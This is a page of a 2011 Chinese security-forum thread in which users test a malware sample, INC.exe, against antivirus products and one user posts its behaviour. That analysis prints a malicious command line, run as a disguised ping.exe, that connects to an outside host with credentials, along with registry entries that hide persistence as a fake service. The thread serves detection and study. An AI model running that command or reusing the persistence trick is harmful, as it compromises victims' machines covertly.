12
返回列表 发新帖
楼主: jayavira
收起左侧

[病毒样本] INC.exe

[复制链接]
qianyuqx
头像被屏蔽
发表于 2011-10-18 17:01:37 | 显示全部楼层
rising miss
cqoper
发表于 2011-10-18 17:05:43 | 显示全部楼层
本帖最后由 cqoper 于 2011-10-18 17:08 编辑

呵呵好久没分析了 本来想在熟悉下分析 借用楼主病毒 详细分析下,结果 有点小事来不及了


INC释放,删除文件

生成两个进程 路径为
MSInstallMgr.exe    C:\WINDOWS\system32\MSInstallMgr.exe
MSInstallMgr.exe 进程启动 srvany.exe
srvany.exe       C:\WINDOWS\system32\srvany.exe

后期启动进程:

父级进程:
   路径: C:\WINDOWS\system32\svchost.exe
   PID: 788
子级进程:
   路径: C:\WINDOWS\system32\ping.exe
   信息: TCP/IP Ping Command (Microsoft Corporation)
   命令行:"C:\WINDOWS\System32\ping.exe" -g no -t 1 -o http://revalati0n-startup.com:8344/ -u lfkrbrynqk -p dxbvsznnbu


远程连接地址


添加部分注册表:

HKLM\SYSTEM\ControlSet001\Services\OracleInstManager\Parameters\Application: "C:\windows\system32\MSInstallMgr.exe"

HKLM\SYSTEM\CurrentControlSet\Services\OracleInstManager\Parameters\Application: "C:\windows\system32\MSInstallMgr.exe"
HKLM\SYSTEM\ControlSet001\Services\OracleInstManager\ImagePath: "C:\Windows\system32\srvany.exe"
HKLM\SYSTEM\ControlSet001\Services\OracleInstManager\DisplayName: "OracleInstManager"
HKLM\SYSTEM\ControlSet001\Services\OracleInstManager\ObjectName: "LocalSystem"

HKLM\SYSTEM\CurrentControlSet\Services\OracleInstManager\ImagePath: "C:\Windows\system32\srvany.exe"
HKLM\SYSTEM\CurrentControlSet\Services\OracleInstManager\DisplayName: "OracleInstManager"
HKLM\SYSTEM\CurrentControlSet\Services\OracleInstManager\ObjectName: "LocalSystem"

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
polluxkyo
头像被屏蔽
发表于 2011-10-18 17:21:08 | 显示全部楼层
FS  Kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
jbng
发表于 2011-10-18 17:52:51 | 显示全部楼层
cis kill
-oAo-
发表于 2011-10-18 19:35:10 | 显示全部楼层
360报木马
梦到内河
发表于 2011-10-18 19:52:35 | 显示全部楼层
NIS12没反映。
留侯
发表于 2011-10-18 22:07:48 | 显示全部楼层
大蜘蛛clean,文件加了壳:
INC.exe - packed by UPX
INC.exe is AUTOIT container
INC.exe\Users\nkun\AppData\Local\Temp\aut7DC6.tmp - packed by ASCRIPT
INC.exe\Development\Hangame\Packaging\MSInstallMgr.exex is BINARYRES container
INC.exe\Development\Hangame\Packaging\MSInstallMgr.exex\data001 is HTML container
INC.exe - container
已上报
hx1997
发表于 2011-10-19 00:18:24 | 显示全部楼层
本帖最后由 hx1997 于 2011-10-19 00:18 编辑

Twister

C:\Documents and Settings\Administrator\桌面\INC.rar>>INC.exe        TrojanDrop.Ghaemo.A.shzz.arc        木马        还未处理
aoqin
发表于 2011-10-21 16:25:23 | 显示全部楼层
MSE  路过了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-8-21 23:21 , Processed in 0.093882 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表